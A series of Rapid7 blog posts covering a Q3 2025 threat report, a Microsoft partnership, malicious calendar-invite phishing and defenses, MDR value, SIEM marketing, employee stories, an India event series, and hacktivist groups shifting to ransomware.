As exposure management evolves from a siloed security function to an operational imperative, Rapid7 will continue to lead with innovation, transparency, and a relentless focus on customer outcomes. We believe our position as a Leader in the 2025 Gartner® Magic Quadrant™ for Exposure Assessment Platforms is not just a recognition of the work we’ve done but a signal to the market of what’s next. Click here to download the full Report.

The Q3 2025 Threat Landscape Report, authored by the Rapid7 Labs team, paints a clear picture of an environment where attackers are moving faster, working smarter, and using artificial intelligence to stay ahead of defenders. The findings reveal a threat landscape defined by speed, coordination, and innovation.⠀

The quarter showed how quickly exploitation now follows disclosure: Rapid7 observed newly reported vulnerabilities weaponized within days, if not hours, leaving organizations little time to patch before attackers struck. Critical business platforms and third-party integrations were frequent targets, as adversaries sought direct paths to disruption. Ransomware remained a most visible threat, but the nature of these operations continued to evolve.

Groups such as Qilin, Akira, and INC Ransom drove much of the activity, while others went quiet, rebranded, or merged into larger collectives. The overall number of active groups increased compared to the previous quarter, signaling renewed energy across the ransomware economy. Business services, manufacturing, and healthcare organizations were the most affected, with the majority of incidents occurring in North America.

Many newer actors opted for stealth, limiting public exposure by leaking fewer victim details, opting for “information-lite” screenshots in an effort to thwart law enforcement. Some established groups built alliances and shared infrastructure to expand reach such as Qilin extending its influence through partnerships with DragonForce and LockBit. Meanwhile, SafePay gained ground by running a fully in-house, hands-on model avoiding inter-party duelling and law enforcement. These trends show how ransomware has matured into a complex, service-based ecosystem.

Nation-state operations in Q3 favored persistence and stealth over disruption. Russian, Chinese, Iranian, and North Korean-linked groups maintained long-running campaigns. Many targeted identity systems, telecom networks, and supply chains. Rapid7’s telemetry showed these actors shrinking the window between disclosure and exploitation and relying on legitimate synchronization processes to remain hidden for months. The result: attacks that are harder to spot and even harder to contain.

Threat actors are fully operationalizing AI to enhance deception, automate intrusions, and evade detection. Generative tools now power realistic phishing, deepfake vishing, influence operations, and adaptive malware like LAMEHUG. This means the theoretical risk of AI has been fully operationalized. Defenders must now assume attackers are using these tools and techniques against them and not just supposing they are. 

This is but a taste of the valuable threat information the report has to offer. In addition to deeper dives on the subjects above, the threat report includes analysis of some of the most common compromise vectors, new vulnerabilities and existing ones still favored by attackers, and, of course, our recommendations to safeguard against compromises across your entire attack surface. 

⠀

Want to learn more? Click here to download the report. 

Across industries, Microsoft is everywhere. It powers productivity, collaboration, and security through Defender, Sentinel, Entra, and the broader Microsoft ecosystem that underpins how modern organizations operate.

⠀

As organizations deepen their Microsoft investments, there’s an even greater opportunity to strengthen and simplify threat detection and response. Microsoft delivers powerful visibility and security insights across user identities, endpoints, and cloud workloads, but security teams often need help bringing those capabilities together with the rest of their environment to ensure that data, detections, and decisions that drive their threat detection and response program align seamlessly. 

⠀

That’s where Rapid7 comes in.

⠀

A shared vision for simplified, unified security

We’re excited to announce the launch of an expanded partnership between Rapid7 and Microsoft, focused on helping organizations fully realize the potential of their Microsoft security investments. Together, we’re building a unified approach to threat detection and response that combines Microsoft’s ecosystem and scale with Rapid7’s AI-native security operations platform and decades of SOC expertise.

⠀

Our shared goal: help customers protect their businesses with clarity, speed, and confidence.

⠀

For many organizations, Microsoft is the backbone of their IT and security programs. But it’s only one part of a larger, interconnected environment. Security leaders need a way to bring Microsoft Defender, Sentinel, and Entra data into context with the rest of their infrastructure, cloud, and SaaS investments. Rapid7 helps make that possible by connecting Microsoft’s advanced telemetry and analytics with broader visibility and context into all security data, automation, and 24/7 expert-led managed operations.

⠀

We’ve long incorporated deep Microsoft visibility across the Command Platform, integrating with tools across different use cases, such as attack surface management, exposure management, cloud security, and application security. This foundation already allows us to correlate insights across on-premises and cloud environments, including Active Directory, Azure, and Microsoft 365 – providing outcomes across endpoints, workloads, and applications. These capabilities unify context from more than a dozen different Microsoft and Azure tools, giving customers a complete picture of risk across their environment. 

⠀

This partnership combines Microsoft Defender’s signal depth with Rapid7’s threat intelligence, automation, and human-led operations to deliver complete visibility and coordinated response across your environment – from Microsoft to everything it touches.

⠀

This means:

• Unified security operations managed for you: Rapid7 delivers 24x7 monitoring, investigation, and response across Microsoft and non-Microsoft environments, combining Defender insights with our own detection and response workflows to act quickly on what matters most.

• Faster, smarter response: AI-driven correlation and human-led expertise reduce alert noise and accelerate containment when threats arise.

• Simplified, predictable operations: Our managed detection and response (MDR) service removes ingestion complexity so you can focus on security outcomes.

• Transparency and trust: Built in through seamless integration with the Microsoft consoles security teams already use.

⠀

A foundation for what’s next

Over the coming months, we'll introduce new capabilities that make it easier for customers to operationalize Microsoft security within the Rapid7 ecosystem, including unified MDR coverage across the Defender products that protect the key vectors of endpoint, identity, cloud, and email.

⠀

These enhancements will enable organizations to not only respond to Microsoft-based threats faster but also proactively reduce risk across their entire environment through unified detection, investigation, and response.

⠀

We’re excited for this next step in advancing our MDR services to meet Microsoft customers where they are and maximize their investments with comprehensive visibility, faster response, and measurable security outcomes.

⠀

We’ll be releasing more information soon. In the meantime, learn more about Rapid7’s leading MDR service here.

A new meeting on your calendar or a new attack vector?

It starts innocently enough. A new meeting appears in your Google calendar and the subject seems ordinary, perhaps even urgent: “Security Update Briefing,” “Your Account Verification Meeting,” or “Important Notice Regarding Benefits.” You assume you missed this invitation in your overloaded email inbox, and click “Yes” to accept.

Unfortunately, calendar invites have become an overlooked delivery mechanism for social engineering and phishing campaigns. Attackers are increasingly abusing the .ics file format, a universally trusted, text-based standard to embed malicious links, redirect victims to fake meeting pages, or seed events directly into users’ calendars without interaction. 

Because calendar files often bypass traditional email and attachment defenses, they offer a low-friction attack path into corporate environments. 

Defenders should treat .ics files as active content, tighten client defaults, and raise awareness that even legitimate-looking calendar invites can carry hidden risk.

The underestimated threat of .ics files

The iCalendar (.ics) format is one of those technologies we all rely on without thinking. It’s text-based, universally supported, and designed for interoperability between Outlook, Google Calendar, Apple, and countless other clients.

Each invite contains a structured list of fields like SUMMARY, LOCATION, DESCRIPTION, and ATTACH. Within these, attackers have found an opportunity: they can embed URLs, malicious redirects, or even base64-encoded content. The result is a file that appears completely legitimate to a calendar client, yet quietly delivers the attacker’s message, link, or payload.

Because calendar files are plain text, they easily slip through traditional security controls. Most email gateways and endpoint filters don’t treat .ics files with the same scrutiny as executables or macros. And since users expect to receive meeting invites, often from outside their organization, it’s an ideal format for social engineering.

How threat actors abuse the invite

Over the past year, researchers have observed a rise in campaigns abusing calendar invites to phish credentials, deliver malware, or trick users into joining fake meetings. These attacks often look mundane but rely on subtle manipulation:

• The lure: A professional-looking meeting name and sender, sometimes spoofed from a legitimate organization.

• The link: A URL hidden in the DESCRIPTION or LOCATION field, often pointing to a fake login page or document-sharing site.

• The timing: Invites scheduled within minutes, creating urgency (“Your access expires in 15 minutes — join now”).

• The automation: Calendar clients that automatically add external invites, ensuring the trap appears directly in the user’s daily schedule.

⠀

Example of where some of the malicious components would reside in the .ics file

⠀

It’s clever, low-effort social engineering leveraging trust in a system built for collaboration.

The “invisible click” problem

The real danger of malicious calendar invites isn’t just the link inside,  it’s the automatic delivery mechanism. In certain configurations, Outlook and Google Calendar will automatically process .ics attachments and create tentative events, even if the user never opens or even receives the email. That means the malicious link is now part of the user’s trusted interface with their calendar.

This bypasses the usual cognitive warning signs. The email might look suspicious, but the event reminder popping up later? That feels like part of your day. It’s phishing that moves in quietly and waits.

Why traditional defenses miss it

Security tooling has historically focused on attachments that execute code or scripts. By contrast, .ics files are plain text and standards-based, so they don’t inherently appear dangerous. Many detection engines ignore or minimally parse them.

Attackers exploit that gap. They rely on the fact that few organizations monitor for BEGIN:VCALENDAR content or inspect calendar metadata for embedded URLs. Once delivered, the file can bypass filters, land in the user’s calendar, and lead to a high-confidence click.

What defenders can do now

Defending against calendar-based attacks begins with recognizing that these are not edge cases anymore. They’re a natural evolution of phishing  where user convenience becomes the delivery mechanism.

Here are a few pragmatic steps every organization should consider:

1. Treat .ics files like active content. Configure email filters and attachment scanners to inspect calendar files for URLs, base64-encoded data, or ATTACH fields.

2. Review calendar client defaults. Disable automatic addition of external events when possible, or flag external organizers with clear warnings.

3. Sanitize incoming invites. Content disarm and reconstruction (CDR) tools can strip out or neutralize dangerous links embedded in calendar fields.

4. Raise awareness among users. Train employees to verify unexpected invites — especially those urging immediate action or containing meeting links they didn’t anticipate. Employees can also follow the helpful advice in this Google Support article.

5. Use strong identity protection. Multi-factor authentication and conditional access policies mitigate the impact if a phishing link successfully steals credentials.

These steps don’t eliminate the threat, but they significantly increase friction for attackers and their malware.

A quiet evolution in social engineering campaigns

Malicious calendar invites represent a subtle yet telling shift in attacker behavior: blending into legitimate business processes rather than breaking them. In the same way that invoice-themed phishing emails once exploited trust in accounting workflows, .ics abuse leverages the quiet reliability of collaboration tools.

As organizations continue to integrate calendars with chat, cloud storage, and video platforms, the attack surface will only expand. Links inside invites will lead to files in shared drives, authentication requests, and embedded meeting credentials. These are all opportunities for exploitation.

Rethinking trust in everyday workflows

Defenders often focus on the extraordinary like zero days, ransomware binaries, and new exploits. Yet the most effective attacks remain the simplest: exploiting human trust in ordinary digital habits. A calendar invite feels harmless and that’s exactly why it works.

The next time an unexpected meeting appears in your calendar, it might be more than just a double-booking. It could be a reminder that security isn’t only about blocking malware, but about questioning what we assume to be safe.

Cybersecurity ROI is notoriously difficult to define, but not impossible.

In this Experts on Experts: Commanding Perspectives episode, Craig Adams chats with Steve Edwards, Director of Threat Intelligence & Detection Engineering, about what customers really get from Rapid7 MDR and how to think more clearly about value.

They cut through buzzwords and talk real-world outcomes: visibility, consolidation, faster response, and trust.

What ROI really looks like

As Steve explains, the ROI conversation starts with confidence. Once customers know they can trust the MDR team to cut through noise and take action, the benefits snowball from reduced false positives, to better visibility and smarter spend.

The IDC study highlighted a 422% ROI over three years. But the real signal is what teams can do with the time and clarity they gain.

To bring these numbers into your own context, you can use the Rapid7 MDR ROI Calculator - simply plug in your own parameters and apply IDC’s methodology to estimate your unique return. Try the ROI Calculator!

Telemetry without tradeoffs

Craig and Steve also dig into one of the biggest detection challenges today: partial visibility. Many orgs still pay by the log, creating disincentives for full data ingestion. MDR’s all-in access model helps customers detect threats earlier and act faster, without needing to triage upstream data decisions.

MITRE mapping makes it click

One of the most actionable insights? MITRE mapping. Steve talks about how customers are using visual coverage data to pinpoint gaps and prioritize onboarding new tech, or building compensating controls.

No-cap incident response

They also walk through what happens during the first 24 - 48 hours of an incident, and why having no cap on IR hours means Rapid7 can stay involved from containment to eradication.

Ready to dive in?

Watch the full episode here
Explore Rapid7's full ROI analysis

⠀

Missed our earlier episodes?
Catch up on Episode 1 with Laura Ellis on agentic AI and system governance [here], Episode 2 with Jon Hencinski on MDR strategy and SOC readiness [here] and Episode 3 with Raj Samani on cybercrime-as-a-service [here]

Every industry has their it’s-that-time-of-year-again rituals, and the cybersecurity industry is no different. The spring ushers in RSA, August is Hacker Summer Camp, October brings with it Cybersecurity Awareness Month — and, before we know it, it’s the end of the year and we’re once again making our “predictions” of what lies ahead. 

A wise young man once said, “Life moves pretty fast. If you don’t stop and look around once in a while, you could miss it.” In our space, a whole lot is moving fast. To see clearly, it's certainly important to take a moment to step away from the noise and look outward.

Many experts offer their predictions for the coming year, but how many stop to look back at how their vision for the current year fared? With that in mind, let’s take a look at the predictions Rapid7 experts made for 2025. 

A look back

Prediction: "Greater visibility will act as a life preserver for security teams treading water across an increasingly complex attack surface."

The importance of unified visibility, attack surface management, and exposure insight has become a leading theme in industry trends reports in 2025. The exposure management market is growing strongly, projected to hit ~$10.9 billion by 2030, which is up from ~$3.3 billion in 2024. Managed Detection and Response (MDR) adoption is also surging; the MDR market reached USD 4.19 billion in 2025 and is forecasted to keep growing fast. 

Rapid7 customer New Zealand Automobile Association (NZAA) offers a real-world example of this trend. Before working with Rapid7, NZAA’s cybersecurity tools were fragmented and disjointed. This lack of a unified approach reduced visibility and slowed down threat responses. Now, with Rapid7’s MDR service, NZAA has a partner that can provide 24/7 support, centralized visibility, and predictable data usage — all with transparency and scalability.

This is just one example of the evidence we’ve seen that security teams are acting to consolidate disparate tooling and connect proactive exposure risk management with reactive detection and response capabilities. As a result, these teams and their organizations are shifting holistically into a confident, resilient security posture.

Prediction: "To thrive in a world where regulatory change is an ongoing concern, SecOps should prepare for both the predictable and the unpredictable."

Regulatory change is indeed accelerating. For example, the EU's Cyber Resilience Act was passed in 2024, with application phases extending toward 2027.

The UK announced the Cyber Security and Resilience Bill in 2024 to extend cyber obligations on organizations. Security operations teams have had to deal with both "expected" regulatory shifts (like NIS2, SEC rules) and unexpected mandates or cross-jurisdictional tensions.

Many organizations are now incorporating compliance readiness, threat modelling for future rules, and flexible architectures. Moving forward, SecOps should expect even more scrutiny over how operations are designed and architected, as well as how insights are shared and with whom.

Prediction: "Cybercriminals will increasingly exploit zero-day vulnerabilities, expanding potential entry points and bypassing traditional security measures to deliver more ransomware attacks."

Zero days have continued to rise in prominence. Since 2023, Rapid7 has observed many notable zero-day-enabled ransomware and supply-chain attacks (e.g. MOVEit exploit, Cleo File Transfer, GoAnywhere MFT, Scattered Spider). 

Attackers are investing in zero-day toolchains, and zero-day brokers are emerging in dark markets (i.e., "exploit-as-a-service" trends). See our Initial Access Brokers Report for more detail.

Rapid7 Q2 2025 Ransomware Trends Analysis research highlights that threat actors are using zero days more often, especially in critical or targeted operations within sectors like services (21.2%), manufacturing (16.8%), retail (14.1%), healthcare (10.3%), and communications, and media (10%). 

In Q3 there were several instances of cybercriminals continuing to leverage zero-day exploits as initial access vectors during their ransomware campaigns. For example, CVE-2025-61882 affecting Oracle E-Business Suite was exploited in the wild by CL0p. The trend of cybercriminals exploiting zero-day vulnerabilities continues, as does the recurrence of not only the same cybercriminal groups, but also the same products being targeted over time (e.g., the file transfer product GoAnywhere MFT). 

A look ahead

2025 has certainly pushed security teams to their limits with an increasingly complex attack surface, accelerating regulatory changes, and a persistent rise in zero-day exploits and ransomware attacks. The ongoing talent gap and the struggle to bridge the divide between technical and business leadership have further compounded these challenges, making it crucial for organizations to prioritize visibility, proactive exposure management, and actionable threat intelligence.

What will 2026 bring? Take a look ahead with our experts: Register now for Rapid7’s Top Cybersecurity Predictions webinar.

Security teams have long depended on SIEM tools as the backbone of threat detection and response. But the threat landscape, and the technology required to defend against it, has changed dramatically.

Rapid7’s new whitepaper, The End of Legacy SIEM and the Rise of Incident Command, examines why legacy SIEM models can no longer keep up with the scale and complexity of modern attacks, and why next-gen SIEMs (like that offered by Rapid7) combined with exposure management capabilities is the better choice in combatting modern enemies.

A turning point for the SOC

When SIEM first emerged, it was a breakthrough. For the first time, organizations could centralize log data, generate compliance reports, and detect threats from a single pane of glass. But two decades later, that approach is showing its age.

Today, data is distributed across cloud, on-prem, and hybrid environments. Adversaries are using artificial intelligence to automate and accelerate increasingly complex attacks that are escaping detection. Analysts are overwhelmed by alert fatigue and unpredictable costs that hamper visibility.

Legacy SIEM tools were built to collect data. They rely on rigid pricing models, static correlation rules, and constant manual upkeep. These systems slow down investigations and prevent analysts from focusing on the alerts that truly matter. Modern attackers exploit exposures faster than human teams can respond. Without automation, context, and clear prioritization, organizations remain in a reactive state. 

What comes after SIEM?

The whitepaper outlines how the security industry is shifting toward a unified approach that combines SIEM, Security Orchestration and Automation (SOAR), Attack Surface Management (ASM), and threat intelligence in one platform, augmented by artificial intelligence.

This new model emphasizes automation, machine learning, and contextual awareness while collecting data from a wider variety of sources than SIEMs were originally designed for. It gives security teams the ability to identify and act on high-impact threats quickly. It also changes how organizations think about risk, focusing less on collecting alerts and more on understanding exposure across assets, identities, and vulnerabilities.

Introducing Rapid7 Incident Command

At the center of this shift is Rapid7 Incident Command, a unified platform that redefines modern detection and response. Trained on trillions of real-world alerts from Rapid7’s 24/7 Managed Detection and Response (MDR) service, Incident Command can accurately classify benign activity 99.93 percent of the time. This precision saves hundreds of analyst hours each week and drastically reduces noise.

Incident Command connects exposure data directly to detection logic, helping analysts see which threats are most likely to impact their organization. Built-in automation enables teams to isolate hosts, revoke credentials, or run response playbooks, while keeping humans in control of every action.

With asset-based pricing and a fast, cloud-based deployment model, organizations can scale visibility and response without the fear of surprise costs or drawn-out implementations.

A new chapter for defenders

Legacy SIEM served its purpose, but it was built for a different era. The modern SOC requires a platform that is unified, intelligent, and focused on outcomes.

The End of Legacy SIEM and the Rise of Incident Command explores how this transformation is reshaping detection and response for security teams everywhere.

Read the full whitepaper to learn why the future of SIEM is already here and how you can take command of what comes next.

Cloud adoption has fundamentally reshaped security operations, bringing flexibility and scalability, but also complexity. In this session from the Take Command 2025 Virtual Cybersecurity Summit, Rapid7’s product leaders discussed how today’s SOC and MDR capabilities must evolve to keep up. Hosted by Ellis Fincham, the panel featured Dan Martin and Tyler Terenzoni, who shared real-world insights on what cloud detection and response truly requires, what CNAPP can and can’t solve, and how to bridge the growing gap between alerts and actionable context.

The cloud has changed the rules

Traditional SOC tooling often struggles to keep up with cloud-native architectures. Dan Martin opened the discussion by highlighting a key shift:

“Detection doesn’t start at the endpoint anymore. It starts with understanding your architecture.”

The panel emphasized that while cloud offers flexibility and scale, it also introduces operational complexity. From short-lived containers to decentralized ownership, cloud environments require a different approach.

Visibility is the starting point

Tyler Terenzoni spoke to the importance of understanding what’s running and who owns it:

“There’s always a disconnect between what engineering thinks is in the environment and what security actually sees.”

He noted that cloud visibility isn’t just about logs, but also understanding user behavior, policy changes, and asset configuration in near real-time. Without this, SOC teams are often reacting to alerts without enough context.

This issue was reflected in the post-event survey, where 35% of respondents listed lack of visibility across the environment as a primary challenge in their threat detection efforts.

CNAPP isn’t the answer - but it helps

The panel clarified that Cloud-Native Application Protection Platforms (CNAPPs) are useful, but not a complete solution. According to Dan Martin:

“CNAPP is great for giving you coverage, but it doesn’t give you the operational context your SOC needs.”

Integrating CNAPP data into SIEM, XDR, and MDR platforms enables richer investigations and tighter correlation across sources.

The shift from alerts to contextual action

Rather than focusing on the volume of alerts, the speakers urged security leaders to ask: can we act on this alert quickly and with confidence?

Dan Martin shared:

“It’s not about reducing alerts, it’s about giving your analysts the context to know what matters and what to do about it.”

Tyler Terenzoni added that turning alerts into action requires better integrations and unified telemetry. Without that foundation, even advanced detections can lead to noise and inefficiency.

AI will play a role, but not alone

While the session didn’t center on AI, the panel acknowledged its growing role in detection workflows. Dan Martin noted:

“AI helps with triage and correlation, but your success still depends on how well your tools talk to each other.”

The emphasis was on automation that supports analysts, not replaces them, especially in cloud environments where missteps can be costly.

Watch the full session on demand

If your team is looking to strengthen cloud detection, improve response times, or better align MDR with cloud operations, this session offers real-world insights and practical guidance.

Watch the Full Session

At Rapid7, we’re pushing the boundaries on what a cybersecurity company can be as we work to build a more secure digital future. In a field where the threat landscape continues to evolve, continuous learning and the development of our people becomes an engine for company success and innovation. With more than a dozen offices around the world, Rapid7’s culture provides a foundation where people can grow their skills and progress in their careers, while driving meaningful impact to the business.

We sat down with three Rapid7 team members from different departments, and across our global offices, and invited them to share more about their own career growth and development. Through the experiences of Vladislav Pavlovski, Manager, Website Development, Courtney Cronin, Account Executive, Commercial, and Daniel McGreevy, Senior Technical Support Engineer, we see a consistent emphasis on teamwork, support from managers, and recognition to fuel career trajectories for Rapid7 employees around the world.

How Rapid7 Managers Support Career Growth

A prominent aspect of Rapid7's culture is the accessibility of leaders and the strong mentorship opportunities available. When stepping into a leadership role to relaunch the company website, Vladislav Pavlovski highlighted how his director, Victoria Krichevsky, helped him balance development work with coordination responsibilities.

"Her feedback helped me realize that I didn’t have to do everything myself — that success meant enabling others as well,”

Vladislav said.

“Her support helped me connect the dots between day-to-day execution and longterm vision and made a big difference in how confident I felt navigating this new territory."

This exemplifies how leaders at Rapid7 provide guidance and support that go beyond task management, focusing on broader growth.

“When I eventually moved into the Website Development Manager role, it was not only the result of the work I put in, but also the outcome of having strong, intentional support from someone who believed in the direction we were heading. That experience really shaped how I think about leadership and mentorship today,”

he said.

For Courtney, her manager also played a direct role in helping her prepare for a promotion opportunity from Sales Development Representative to Account Executive.

“I had the opportunity to meet with each of the Commercial Sales Managers to sharpen my skills as a future AE. We focused on roleplays, reviewed enablement on our products and services, introduced negotiation strategies, and refined my presentation skills. That level of investment in my development from both my current manager and the team I was looking to grow into made a huge impact, and I’m grateful for how collaborative and encouraging the team was during that transition.”

Courtney also shared how she values learning from her manager’s career growth as a woman in sales.

“I take full advantage of having a manager who started in the same role, especially as a woman in sales,”

she said.

“She understands the challenges firsthand and has been a huge influence in building my confidence. I make the most of her experience by asking for advice, learning how she navigated similar situations, and applying those lessons to my growth. Her journey and success show me what’s possible to achieve here at Rapid7, and I’m grateful to have her as both a mentor and a role model!”

Vladislav also noted,

"Leaders are accessible, and there’s a real openness to ideas from any level. It’s not about titles — it’s about potential and contribution."

This approach makes employees feel valued and encourages them to take ownership of their development.

Collaboration as a Catalyst for Growth

In addition to support from leaders, Rapid7 works to create an environment where employees can seek encouragement and guidance from peers and cross-functional partners when faced with challenges.

Daniel McGreevy started at Rapid7 as an apprentice and leveraged the expertise of his colleagues to grow his own capabilities and progress through his career.

“Working with our Technical Support experts across multiple products, and getting feedback from Support Engineers helped improve enablement across Global Support and really impacted how I approach solving complex challenges,”

he said.

Additionally, he shared how collaboration with product management and engineering teams impact product releases and ensure support is ready and equipped to assist customers effectively.

“By collaborating with different teams across the business, we’re able to improve how we service our customers while gaining additional context on the business, our products, and the goals and objectives of each of the teams we partner with and how it contributes to our bigger company initiatives.”

Incorporating this holistic view has played a role in Daniel’s progression into a Senior Technical Support Engineer.

For Vladislav, leading the launch of a new website was a significant career milestone, but what he says he’s even more proud of was the collaboration and partnership between various teams to get it over the finish line.

“The website launch was a huge project with high visibility and complex cross-functional alignment,”

he said.

“We created a space where everyone felt safe to contribute, ask for help, experiment, and make mistakes. We built trust between team members, and when people are not afraid to challenge ideas and share concerns, that openness drives better outcomes for everyone.”

Career Opportunities at Rapid7

The stories of Vladislav, Courtney, and Daniel paint a vivid picture of career growth and development at Rapid7. From accessible leadership and structured support to recognition and empowerment, Rapid7 fosters an environment where employees can thrive.

To learn more about working at Rapid7, visit our careers site: careers.rapid7.com
To view all open jobs, visit careers.rapid7.com/jobs/search

As India's economy rapidly digitizes, cybersecurity challenges are becoming increasingly complex. This May, Rapid7 launched our inaugural Global Security Day series across India, bringing together top security leaders in Mumbai, Delhi, and Bengaluru to address the most pressing cyber threats facing organizations in 2025.

Key insights that emerged

Across all three cities, several critical themes emerged that are shaping India's cybersecurity landscape:

AI is No Longer Optional: Organizations recognize that AI has become essential for threat detection, exposure management, and SOC operations. The question is no longer whether to adopt AI, but how to implement it effectively.

Attack Surface Explosion: Cloud misconfigurations, insecure APIs, and identity misuse are driving today's biggest risks. Organizations are struggling to maintain visibility and control across increasingly complex environments.

SOC Modernization is Urgent: Traditional Security Operations Centers need fundamental transformation, with automation and AI at their core to handle the volume of modern threats.

Talent Gap Challenges: Upskilling and reskilling initiatives are critical to closing the cybersecurity talent gap that's affecting organizations globally, but particularly acutely in India's booming tech sector.

Regulatory Evolution: India's evolving cybersecurity regulatory landscape is shaping how organizations approach their security investments and strategy development.

A journey across India's cyber capital cities

Our three-city roadshow, organized in collaboration with Information Security Media Group (ISMG), focused on the theme "2025 Cyber Threat Predictions: AI-Driven Attacks, Ransomware Evolution, and Expanding Attack Surface." The response from India's cybersecurity community was overwhelming, with 138 security leaders and delegates participating across all three cities.

Launching with impact in Mumbai (May 8)

Our Mumbai kickoff set the tone for the entire series, drawing 43 security leaders eager to dive into critical cybersecurity challenges. Rob Dooley, General Manager APJ, welcomed attendees before Regional CTO Robin Long delivered comprehensive insights on:

• Global and Asia-Pacific threat landscape trends
• The evolution of ransomware from double extortion to hybrid attacks
• Expanding attack surfaces driven by cloud misconfigurations and insecure APIs
• Next-generation defense strategies leveraging AI and continuous threat exposure management (CTEM)

The highlight was our fireside chat featuring Starlin Ponpandy, CISO of Orion Systems and Rapid7 customer, discussing ‘Building a New-Age SOC: Practical Applications of AI’. The conversation explored choosing the right SOC model, building effective teams, and navigating the complexities of AI trust and explainability.

The main focus of the Q&A was the evolving cyber threat landscape and how organizations can prepare for 2025's AI-driven, increasingly complex attack environment.

The conversation was dominated by leaders sharing insights on the rise of AI-powered threats, the shift in ransomware tactics to double and hybrid extortion and the urgent need for proactive threat exposure management. Rapid7's emphasis on real-time, AI-enabled defenses and automated risk management strategies sparked strong engagement.

Strategic dialogue in Delhi (May 13)

Our Delhi event brought together 43 delegates for candid, strategic discussions about 2025's top cyber threats. Security leaders engaged in deep conversations about AI-powered detection and defense, proactive exposure management, and building resilient SOCs with automation.

The panel discussion on ‘Building a New-Age SOC’ addressed critical challenges including the cybersecurity talent gap and integrating security into DevOps workflows, a thought-provoking conversation examining identity-centric security models and the shift from traditional SOCs to Managed Detection and Response solutions.

Attendees posed incisive questions about upskilling teams in an AI-driven environment, managing tool sprawl, and operationalizing security by design - highlighting the sophisticated thinking of India's cybersecurity leadership.

Tactical discussions in India’s Silicon Valley - Bengaluru (May 15)

Our Bengaluru finale drew the largest crowd with 52 delegates, including CISOs and cybersecurity executives from across South India. The discussions were highly tactical, focusing on:

• Modernizing SOCs through AI-led threat detection
• Countering double and triple extortion ransomware
• Risk automation and secure cloud transformation

Veteran industry speaker Satish Kumar Dwibhashi joined Robin Long for discussions that reinforced a clear theme: security strategy must evolve in lockstep with attacker innovation.

Building for the future

The success of our India Security Days reflects not just the hunger for cybersecurity knowledge in the region, but also Rapid7's commitment to supporting India's digital transformation journey. We're excited to announce that we're expanding our presence with a Global Capability Center (GCC) in Pune, which will serve as a hub for innovation and home to teams across engineering, business support, and our Security Operations Center (SOC).

This initiative represents more than just business expansion - it's about building cybersecurity capability and expertise right here in India, that will shape a secure digital future for organizations around the world.

The road ahead

The conversations, connections, and insights from our India Security Days have reinforced our belief that India's cybersecurity community is among the most forward-thinking globally. The challenges are significant - from AI-powered attacks to evolving ransomware tactics - but so is the talent, innovation, and determination to address them.

As we look toward 2025 and beyond, events like these remind us that cybersecurity is ultimately about people: the security leaders making tough decisions, the practitioners implementing defenses, and the communities sharing knowledge and supporting each other.

Thank you to all the security leaders who joined us in Mumbai, Delhi, and Bengaluru. Your engagement, questions, and insights made these events truly impactful. We look forward to continuing these conversations and supporting India's cybersecurity community as we navigate the challenges and opportunities ahead.

Interested in joining our growing team in India? Learn more about career opportunities at our new GCC in Pune.

Co-authored by Yaniv Allender and Alexandra Blia

Introduction

In the ever-evolving landscape of cyber threat actors, the lines between ideologically driven hacktivism and financially motivated cybercriminals have become increasingly blurred. Originally fueled by political, social, or ethical causes, hacktivist groups have historically engaged in digital protest through website defacements, data leaks, and distributed denial of service (DDoS) attacks.

However, in recent years, a noticeable trend has emerged. Some hacktivist groups are evolving into ransomware operations and even becoming ransomware affiliates. This transformation is driven by a mix of ideological fatigue, opportunity for financial gain, access to sophisticated tools, and the growing profitability of extortion-based attacks. The result is a new hybrid threat actor—one that merges the disruptive zeal of hacktivism with the ruthless efficiency of cybercrime.

Understanding this shift is crucial for defenders, as it represents a convergence of motives that complicates attribution, response, and mitigation strategies. To this end, we have examined three prominent examples of relevant threat actors, namely FunkSec, KillSec, and GhostSec, identifying the drivers behind their transition to financially motivated campaigns and exploring the shift in their modus operandi.

Threat actor analysis

FunkSec

The FunkSec ransomware group emerged within the cybercrime ecosystem as a rising star in December 2024. The ransomware-as-a-service (RaaS) group has claimed at least 172 victims to date. The group proudly promotes itself as an AI-driven ransomware group, with their encryptor, FunkLocker, and some of the malware’s source code allegedly generated using generative AI tools.

The group targets organizations from various sectors and regions, such as government, education, automotive, energy, IT, and manufacturing, located in countries like the United States, Israel, France, Italy, Germany, India, and Australia.

FunkSec started as a politically motivated hacking (hacktivist) group, specifically interested in targeting the United States (Figure 1). The group was known to be aligned with the “Free Palestine” movement (Figure 2), and associated itself with other hacktivist groups, such as Ghost Algeria and Cyb3r Fl00d. Among its affiliates are Scorpion (AKA DesertStorm, a suspected Algeria-based hacker), El_farado, XTN, Blako, and Bjorka (an alleged Indonesian hacktivist). In its early days, the group offered tools commonly associated with hacktivist activities, including services for DDoS and defacement attacks.

At some point, the group transitioned its focus from politically motivated attacks to a RaaS model, offering customizable tools to its affiliates. Its victimology also changed from government entities to organizations across various sectors, such as education, technology, telecommunications, and agriculture (Figure 3).

FunkSec’s reliance on relatively simple malware development using AI-based tools also explains the fast transition of the group from targeted hacktivism campaigns to broader, financially-motivated activities, with a large number of victims in a short period of time (Figure 4).

The group’s transition has also been referenced on a Russian-speaking dark web forum, where the author mentioned a cybersecurity vendor’s article on FunkSec (Figure 5).

KillSec

The KillSec hacktivist group (AKA Kill Security) has been active since at least 2021. The Russia-aligned group targets organizations from various sectors, such as government, finance, transportation, electronics, manufacturing, travel and recreation, retail, and consumer services, located in countries like India, Bangladesh, Romania, Poland, and Brazil. The group considers itself a “prominent hacktivist group operating in the cyber realm, with a focus on both disruption and digital activism."

KillSec initially emerged as a hacktivist group aligned with the Anonymous collective, with its operations primarily including DDoS attacks and website defacements, before pivoting to ransomware operations in October 2023. KillSec’s ransomware variants, namely KillSecurity 2.0 and KillSecurity 3.0, are designed to encrypt files and demand ransom payments for decryption.

In June 2024, KillSec introduced a RaaS operation, advertising a locker for Windows environments written in C++ and a dashboard, enabling affiliates to observe detailed statistics, conduct chat communications, and customize ransomware configurations using a builder tool. In November 2024, the group launched an additional locker for ESXi environments, expanding the breadth of its operations (Figure 6).

The group’s shift is aligned with the overall proliferation of RaaS programs, enabling less technically skilled individuals to conduct ransomware attacks with relative ease in exchange for a fee. The group has been advertising its RaaS offering in an attempt to attract cybercriminals and further broaden its affiliate network (Figure 7).

